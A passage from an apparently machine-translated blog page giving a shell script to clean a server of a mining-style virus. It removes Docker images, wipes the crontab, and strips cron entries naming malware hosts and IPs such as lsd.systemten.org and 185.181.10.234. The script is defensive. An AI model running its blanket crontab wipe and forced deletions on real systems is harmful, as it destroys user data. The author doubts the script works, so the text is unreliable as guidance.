print $3}' | xargs -I % docker rmi -f % docker images -a | grep "slowhttp" | awk '{
print $3}' | xargs -I % docker rmi -f % # Those who have their own scheduled tasks can use the scheduled tasks belonging to the virus awk Filter out Then write back your company's scheduled tasks or use the following crontab -l > conf && echo > conf && crontab conf && rm -f conf # Write the scheduled task to the background comparison script The technology is simple Not sure if it will run if [ `crontab -l | wc -l` -eq x ]; then echo "cron good" else ( crontab -l 2>/dev/null echo " The scheduled task is not the previous number " ) | crontab - fi crontab -l | sed '/update.sh/d' | crontab - crontab -l | sed '/logo4/d' | crontab - crontab -l | sed '/logo9/d' | crontab - crontab -l | sed '/logo0/d' | crontab - crontab -l | sed '/logo/d' | crontab - crontab -l | sed '/tor2web/d' | crontab - crontab -l | sed '/jpg/d' | crontab - crontab -l | sed '/png/d' | crontab - crontab -l | sed '/tmp/d' | crontab - crontab -l | sed '/zmreplchkr/d' | crontab - crontab -l | sed '/3.215.110.66.one/d' | crontab - crontab -l | sed '/pastebin/d' | crontab - crontab -l | sed '/onion/d' | crontab - crontab -l | sed '/lsd.systemten.org/d' | crontab - crontab -l | sed '/shuf/d' | crontab - crontab -l | sed '/ash/d' | crontab - crontab -l | sed '/mr.sh/d' | crontab - crontab -l | sed '/185.181.10.234/d' | crontab -
# every other 90 Once per second
sleep 90
done
Postscript
networkmanger Similar to the above virus
Please refer to similar articles :
http://hackernews.cc/archives/31248
边栏推荐
- How does zhiting home cloud and home assistant access homekit respectively? What is the difference between them?
- Talking about the foundation of function test today
- Those high-frequency and real software test interview questions sorted out by the test director in 7 days, come to get
- E-commerce project environment construction
- The error log of vscode connecting to the server shows the problem of "insufficient permission". Directly use root to connect
- Boomfilter learning
- Interviewer: why does TCP shake hands three times and break up four times? Most people can't answer!
- Day 29/100 local SSH password free login to remote
- Nnformer reading notes
- Great changes in the interaction between people and the digital world
猜你喜欢
The live registration is hot to start | the first show of Apache dolphin scheduler meetup in 2022!
Cvpr2020 | the latest cvpr2020 papers are the first to see, with all download links attached!
"Space guard soldier" based on propeller -- geosynchronous geostationary orbit space target detection system
Tencent music knowledge map search practice
Yunzhisheng atlas supercomputing platform: computing acceleration practice based on fluid + alluxio (Part 2)
Popular understanding of deviation and variance in machine learning
Yolov4 improved version comes out! Yolov4 extended edition! Yolov4 launched scaled-yolov4: scaling cross stage partial network
Understanding C language structure pointer
2022 oceanbase technical essay contest officially opened | come and release your force
Causes and solutions of unreliable JS timer execution
随机推荐
[machine learning] machine learning from zero to mastery -- teaching you how to use decision tree to predict contact lens types
Transunet reading notes
Day 29/100 local SSH password free login to remote
What are cookies in Web site development?
Is it safe to open an account with a mobile phone? Where can I open an account to buy shares?
Several ways to obtain domain administrator privileges
[phase 23] phased summary of spring recruitment practice (Alibaba cloud has OC)
Cvpr2020 | the latest cvpr2020 papers are the first to see, with all download links attached!
[untitled]
Cloud development practice of the small program for brushing questions in the postgraduate entrance examination - page design and production (home page of the question bank, ranking page, my)
Interviewer: why does TCP shake hands three times and break up four times? Most people can't answer!
TypeError: __ init__ () takes 1 positional argument but 5 were given
Attention to government and enterprise users! The worm prometei is spreading horizontally against the local area network
Inventory - those automated test interview questions you can't help but know
Leetcode daily [2022 - 02 - 17]
Pcl+vs2019 configuration and some source code test cases and demos
The live registration is hot to start | the first show of Apache dolphin scheduler meetup in 2022!
Splunk series: Splunk data import (II)
Tencent music knowledge map search practice
Recommend a free screen recording software